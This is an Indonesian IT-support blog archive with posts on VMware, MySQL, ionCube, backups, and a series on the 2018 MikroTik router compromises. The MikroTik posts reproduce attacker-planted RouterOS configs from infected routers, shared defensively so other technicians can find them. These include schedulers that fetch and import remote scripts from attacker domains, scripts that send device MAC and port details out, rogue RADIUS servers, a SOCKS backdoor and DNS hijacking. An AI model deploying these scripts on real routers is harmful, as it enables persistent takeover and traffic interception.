Arsip Kategori: Technical Support – IT

Troubleshooting VMware : Tidak bisa start VM (Failed to start the virtual machine (error -18))

email : ariyaandro@gmail.com

berikut ada troubleshooting tiba2 vm tak mau up alias start, dikarenakan ada error. dugaan sementara efek vm nya kena lampu mati (tak ada UPS) atau vmtool nya tak terinstall jadi waktu vm mati di anggap oleh vmware server nya ada masalah power yang berimbas ke vm os…
vm yang bedampak ini pada vm linux, vm windows tak ada maslah up pertama vmware server dinyalakan kembali.

belum sempat cupture, akhirnya cari2 contoh screenshot nya deh… hehehhe

problem yang di terima mimin cuman “Failed to start the virtual machine (error -18)”

setelah beberapa buka link user, langsung menduga pada file yang yantol dan seharusnya tak ada bila suatu vm sudah mati yaitu *.vmx~

solusinya : rename saja (misal .vmx~ jadi .vmx1) atau hapus, dan start vm linux nya akhirnya jalan deh lagi ^_^

contoh file yang masih ada vmx~ nya seperti gambar berikut

link gambar terkait : https://communities.vmware.com/thread/575446

SOLUSI LINK terkait :

https://nerdblurt.com/failed-to-start-the-virtual-machine-error-18/

https://kb.vmware.com/s/article/2108710

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Iklan

Mikrotik : Wabah November 2018

email : ariyaandro@gmail.com

post yang lalu yaitu :

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

Mikrotik : Wabah september 2018

Mikrotik : Wabah Oktober 2018

update temuan script hacked yang baru lagi,…

 

/system scheduler
add interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\
han.pythonanywhere.com/\" dst-path=tmp} on-error={:put \"get http error\"}\
;\r\
\n/import tmp;\r\
\n/file remove tmp;" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
mar/31/2018 start-time=20:21:00



/system script
add name=script4_ owner=xxx policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
ddress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\
lt=no"

 

/ip dns
set allow-remote-requests=yes servers="94.247.43.254,1\
07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141"




/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=8080




/ip proxy
set cache-path=web-proxy1 enabled=yes




/ip service
set telnet disabled=yes
set ftp disabled=yes
set ssh disabled=yes
set api disabled=yes
set winbox disabled=yes port=40527
set api-ssl disabled=yes
/ip socks
set enabled=yes port=30526
/ppp aaa
set use-radius=yes




/radius
add address=45.79.109.133 secret=test service=ppp,login,dhcp
add address=139.162.71.145 secret=test service=ppp,login,dhcp
add address=128.199.172.32 secret=test service=ppp,login,dhcp
add address=178.128.214.44 secret=test service=ppp,login,dhcp




/radius incoming
set accept=yes port=1700




/user aaa
set default-group=full use-radius=yes



/system scheduler
add interval=10m name="DDNS Serv" on-event="/system script run iDDNS" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
add interval=20m name="DDNS Backup" on-event=":global mac [/interface ethernet\
\_get 0 mac-address]\r\
\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
\"_\".[/ip proxy get port])\r\
\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\
\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
\n:do {/tool fetch address=azdns.ru src-path=\$cmd mode=http dst-path=dns}\
\_on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pat\
h=dns}\r\
\n:delay 3s;/import dns;:delay 4s;/file remove dns" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
add interval=1d name="DDNS reLoad" on-event=":do {/tool fetch url=http://src.c\
lick/error.html mode=http dst-path=flash/webproxy/error.html;/tool fetch u\
rl=http://src.click/error.html mode=http dst-path=webproxy/error.html} on-\
error={/tool fetch url=http://priv.su/error.html mode=http dst-path=flash/\
webproxy/error.html;/tool fetch url=http://priv.su/error.html mode=http ds\
t-path=webproxy/error.html}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
/system script
add name=iDDNS owner=adminuser policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\
\_mac [/interface ethernet get 0 mac-address]\r\
\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
\"_\".[/ip proxy get port])\r\
\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\
\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
\n:do {/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dn\
s} on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pa\
th=dns}\r\
\n:delay 3s;/import dns;:delay 4s;/file remove dns"


soooo, jangan kelupa cek2 config lainnya ya.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Troubleshooting : MySQL on CentOS 7 (remove & clean db)

email : ariyaandro@gmail.com

disini mimin akan memberi kelengkapan lanjut bila ada kendala waktu menghapus mysql 5.6 khusunya pad CentOS 7, bila sudah dilakukan reinstall atau remove mysql namun masih ada kendala config sebelumnya seperti user atau db yang tak langsung ikut terhapus juga.

berdasar video berikut yang juga sempet mimin lakukan, menghasilkan hasil install ulang yang sama yaitu user dan db sebelumnya masih masuk setelah install ulang mysql..

video berikut akan remote ke centos 7 melalui ssh,

solusi lanjutnya yaitu, dengan memaksa clean / delete folder database dari mysql secara langsung (bila sudah backup database sebelumnya)

untuk lokasi foldernya ada di sini biasanya

/var/lib/mysql

dimana itu ada folder database, maka hapuslah secara rekursif satu-satu (klo tidak banyak) klo banyak langsung rekursif folder mysql saja,… 🙂

lalu lanjut install ulang mysql nya sesuai versi sebelumnya atau terbaru.

 

semoga bermanfaat

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Mikrotik : Wabah Oktober 2018

email : ariyaandro@gmail.com

mimin lagi mimisan sekarang mendapat serangan bertubi-tubi soal bug mikrotik ini. sekali lagi ini bug yang dimanfaatkan menjadi tool lalu dimasifkan ke seluruh mikrotik secara bot. sehingga banyak penyesangan pada router mikrotik hingga beberapa bulan trakhir ini. dari postingan hajime hingga sekarang menemui sekitar 3 macam medode serangan termasuk sekarang.

post yang lalu yaitu :

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

Mikrotik : Wabah september 2018

berikut capture serangan yang terjadi

ini baru sempat ngoprek config mana saja yang di sasar,.. berikut hasilnya :

/ip firewall connection tracking
set enabled=yes


/ip dns
set servers=199.168.99.27,199.168.99.28


/ip firewall filter
add action=drop chain=input comment="drop ftp brute forcers" dst-port=21 \
protocol=tcp src-address-list=ftp_blacklist
add action=reject chain=output dst-address=139.99.5.202 protocol=tcp
add action=reject chain=output dst-address=95.154.216.166 protocol=tcp
add action=accept chain=input dst-port=6797 protocol=tcp
add action=accept chain=output content="530 Login incorrect" dst-limit=\
1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist \
address-list-timeout=3h chain=output content="530 Login incorrect" \
protocol=tcp


/ip service
set telnet disabled=yes
set ftp disabled=yes
set www port=8081
set ssh port=22515
set api disabled=yes
set winbox disabled=yes
set api-ssl disabled=yes
/ip socks
set enabled=yes max-connections=500 port=6797
/ip socks access
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0

ada serangan juga membuat seding mac address WAN seperti berikut

hacked-sending_mac

 

add dont-require-permissions=no name=iDDNS owner=admin policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\
\_mac [/interface ethernet get 1 mac-address]\r\
\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
\"_\".[/ip proxy get port])\r\
\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\
\".[/interface pptp-server server get enabled])\r\
\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
\n/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dns;:de\
lay 3s\r\
\n/import dns;:delay 4s;/file remove dns"

dan jika diperhatikan kembali ada user login baru pada PPP yang menyasar password dengan mac address…

coba lakukan update os mikrotik, walau di update nya tidak ada penjelasan spesifik pembenahan bug soal hacked beberapa bulan terakhir ini. jadi disambi closing port atau service yang ada pada router diperlukan. ketika posting ini ada, masih mencapai update os 18 sept 2018 saja

bila ada kesulitan update seperti biasanya, maka perlu di coba format ulang router dengan netinstall. bila resiko netinstall ggal maka router tak akan bisa booting, maka sediakan mikrotik cadangan seperlkunya.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Mikrotik : Wabah september 2018

email : ariyaandro@gmail.com


belum genap 3 bulan penulis membahas impact serangan mikrotik kapan lalu di link berikut

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

 

Mikrotik : Wabah Oktober 2018

sudah ada yang lain yang belum jelas serangan seperti apa ini, yang jelas mem block koneksi IP public kembali dan mengisolasi akses dari beberapa IP. untungnya login mikrotik tidak di tutup total masih mau login via mac address antar mikrotik.

berikut beberapa capture config yang di obrak-abrik wabah mikrotik, yang belum sempat cek script config satu-satu… hehehhehhe

serangan pertama pertengahan september, tak diketahui apakah di sumber yang sama atau bagimana. ada pergerakan filter firewall yang aneh. akses ippublic terhalagi, untuk via MAC address masih bisa.

serengan berlanjut di akhir bulan september, yang semakin brutal hingga membuat script dan upload download ke link tak jelas arah lintang nya. dan yang ini tak tahu juga apah dari sumber yang sama di serangaan sebelumnnya.

ini baru sempat ngoprek config mana saja yang di sasar,.. berikut hasilnya :


/ip dns
set servers=”94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.20\
8.208.141″

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=8080
add action=redirect chain=dstnat comment=sysadminproxy disabled=yes dst-port=\
80 protocol=tcp src-address-list=!Ok to-ports=8080
add action=dst-nat chain=dst-nat disabled=yes dst-port=3333 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=8888 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=14444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=8008 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=4444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444

/ip proxy
set enabled=yes

/ip proxy access
add action=deny comment=sysadminpxy

/system note
set note=”DEVICE HACKED – ACCOUNT ftp HAD UNSAFE PASSWORD”

/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235


sedangkan pada menu file disk mikrotik ada file aneh berikut

yang salah satunya yaitu mikrotik.php dengan isi berikut

:do { /system scheduler set U3 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U3 not found”}

:do { /system scheduler set U4 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U4 not found”}

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

troubleshoot : Install IonCube Loader – Centos 7.4

email : ariyaandro@gmail.com

kali ini penulis akan share sedikit, tentang sebuah loader untuk web server pada linux. ya walau awal cobanya langsung jalan namun untuk pelengkap beberapa artikel lainnya yang mungkin ada yang bermasalah saat install ioncube ini bisa membantu dalam troubleshoot nya bila tutorial sebelah tak bisa jalan dengan baik, atau mengurangi anggapan negatif bahwa teori berbanding jauh dengan praktik itu tak sepenuhnya benar.

ok dalam install ioncube pada linux web server khususnya lebih diperhatikan step/langkah point yang perlu diperhatikan yaitu

  1. download ioncube loader
  2. extrak dan copas module ioncube
  3. load/panggil dari service PHP

itulah kurang lebih check point yang perlu diperhatikan, selebihnya pakai pemahaman sendiri dalam pembagian langkah utama juga bebas…. hehhehehe

  1. web server siap
    diharapkan sebelum test pasang ioncube web server linux sudah berjalan normal sesuai keinginan sudah…
  2. baca beberapa artikel isntall ioncube
    silahkan baca beberapa artikel sebelah untuk membandingkan cara2 installasi ioncube dengan benar. dimana artikel disini hanya untuk memperhatikan segi troubleshoot yang tak terduga dan tak selalu di jelaskan pada artikel lainnya.
  3. download ioncube
    disini bisa saja download langsung dari terminal linux dengan wget atau semacamnya. atau downlaod terpisah di luar (windows). hasil downloadnya cukup ambil module misal “ioncube_loader_lin_5.6.so” saja yang di ambil dan di upoad ke web server linux.
    tentunya sudah memastikan dulu seperti cek versi php yang sedang jalan dan adanya service ftp untuk layanan upload ke linux (tool upload seperti filezilla)
    dan file “loader-wizard.php” dari extrakan tadi yang perlu di upload atau dijalankan di web server (dengan sebelumnya buat folder sendiri baiknya untuk memanggil file tersebut misal \var\www\html\ioncube\loader-wizard.php), dimana nanti dilajut dengan memanggilnya pada browser [ipserver]\ioncube\loader-wizard.php
  4. load/panggil dari service PHP
    PENTING !!! disini artikel pentingnya kawan… sibak baik2 ya.
    setelah download paket ioncube loader, silahkan buka filenya. masukkan loader-wizard.php pada lokasi root web server. ini cara muda sih install ioncube dengan wizard yang ada, yg sudah pro linux mungkin tak perlu ini dah langsung jalanin saja. ini penulis load dalam root folder web server seperti berikut hasilnya, perhatikan owner foldernya hingga permission foldernya itu 775. waktu penulis coba sebenarnya lagi di posisi mode root, bukan posisi user seperti gambar dibawah ini (namanya juga menambilkan.. 😀 )

    lalu upload file loader-wizard.php ke folder ioncube hingga seperti ini,
    untuk kepemilikan sepertinya bisa bebas, tak harus root atau apache.
    dan jika di panggil dari browser akan ada proses inisialisasi untuk kroscek kompabilitas dari web server dan akan menampilkan petunjuk install ioncube yang sudah disesuaikan. contoh hasil prosesnya seperti berikut (browser [ipserver]\ioncube\loader-wizard.php)
    sumber dari artikel sebelah…
    lalu bila inisialisasi berhasil akan diberikan sedikit intruksi lagi untuk cara load model ioncube pada service php yang lebih direkomendasikan.
    sumber dari sebelah juga… yang tentunya akan sedikit berbeda dengan yang di demo kan pada gambar di atas.
    langsung lanjut dengan klik point ke 3 pada “save this 20-ioncube.ini file” (penulis mendapati hasil inisialisasinya dengan file 00-ioncube.ini) dan copy-paste ke folder yang di sarankan. file dari penulis download dan upload ke web server, baru copas.
    oh ya lupa, penulis menggunakan php 5.6 yang diperolah dari package fedora, jadi posisi hasil insyaller php 5.6 ini agak berbeda. dan penulis letakkan pada folder berikut (maaf tak capture hasil inisialisasi ioncube yang dikerjakan penulis)
    maka tinggal melanjut restart service web server saja. dan buka kembali browser [ipserver]\ioncube\loader-wizard.php
    maka akan diperoleh hasil seperti berikut,

    selamat itu tandanya sudah terinstall dengan benar, namun baiknya di test lebih pasti. sayangnya dalam paket loadernya ioncube ini tak ada file yang seperti test.php yang berisi encrypt, mau coba pun harus download tools ioncube encrypt nya versi trial/beli dan konversi file dulu. dah penulis sediakan di point berikutnya.
  5. Test fungsi ioncube
    PENTING !!! disini artikel pentingnya berikutnya kawan… sibak baik2 ya.
    penulis mendapat info dari artikel sebelah, sebenarnya ada web app yang menggunakan fitur ioncube ini dalam file php nya. nah penulis dapat ini tak semua harus dicoba, yang penting proses loader ioncube nya terlihat berjalan.
    seperti biasa diawal, download file php ini. lalu upload semua ke folder tersendiri dalam root web server dan panggil. hasilnya php running tuh lihat…
    contoh gambar file php yg sudah di load ke web server.

    walau dalam file index.php sudah menjadi bahasa tumbuh2an hehhehehehhe… :D..

    contoh file yang sudah ter-encrypt oleh ioncube

begitulah kurang lebihnya, semoga bermanfaat.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Backup : hasil coba backup OS dengan Veeam dan Acronis (personal/home) yang free

email : ariyaandro@gmail.com

untuk bahasan backup secara teknis bisa melihat post sebelumnya.

https://pmdkduaonline.wordpress.com/2018/04/24/artian-backup-dari-sisi-infrastruktur-teknis/

berikut penulis mencoba bagaimana hasilnya dan prosesnya untuk salah satu aplikasi backup khusus untuk OS (walau di dalamnya juga ada jenis backup file atau partisi harddisk). apliaksi yang di coba yaitu veeam endpoint (free) dan acronis true image 2018 (trial).

langsung saja disini lebih menjelaskan hasil proses teknisnya, yang menurut penulis ini tidak afektif bila di gunakan waktu OS sedang running. dimana waktunya lebih lama (namun wajar, karena ini os sedang running) dan proses backupnya langsung bisa buffer hingga di atas kapasitas disk yang termakan OS. penulis waktu mencobanya benar2 menguras read-write HDD dan waktunya mungkin bisa seharian.

berikut disk win OS yang ada, kira2 sudah termakan 50’an GB….

drive C akan di backup menggunakan acronis dulu, dimana lebih direkomendasikan backup ke luar HDD local seperti file sharing lainnya atau NAS.

jika diperhatikan sekilas saja pada hasil backupnya, terihat pada size tertentu akan disambung ke file backup lagi dan backup yang terkalkulasi oleh acronis yaitu kisaran 100 GB padahal bisa terlihat bahwa drive widnows nya hanya sedang memankan 50’an GB. sedangkan waktu penulis mencoba acronis yang under Hirren bootabe saja (tentunya saat windows tak aktif) menghasilkan satu file backup full kisaran 27’an GB saja.

kesimpulan berhubung ini punya dukungan dukungan cloud drive acronis tersendiri dan edisi 2018 sudah support malware ransome protect tentu jadi pertimbangan khusus tersendiri bagi yang membutuhkannnya.

 

sedangkan untuk veeam endpoint free ini juga memiliki hasil backup OS windows yang besar pula, masih dalam proses 7% saja sudah menghasilkan size backup 16’an GB. misal hasil sementara itu dikalikan 10x lipat maka menghasilkan 160’an GB, sedangkan drive C yang termiliki berapa apalagi dibandingkan nilai kalkulaksi hasil backup acronis. setting pada aplikasi ini, selalu diminta confing ulang semisal hanya ingin melihat kembali backup yang ada itu diarahkan ke mana (coba click menu configure backup setiap membuka awal apliaksi ini). serta waktu proses backup ke NAS tersebut, mengalami putus dan tentunya pengulangan dilakuakn dari awal proses backupnya.

kesimpulan aplikasi ini masih terlallu besar dibanding proses file backup dari acronis, dan belum mendukung fitur khusus seperti yang diulas pada acronis di atas.

secara keseluruhan, ini lebih efektif waktu backupnya tidak dilakukan di saat aktif menggunakan windows, percobaan di atas telihat bahwa tak ada apliaksi yang sedang dijalankan.

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

%d blogger menyukai ini: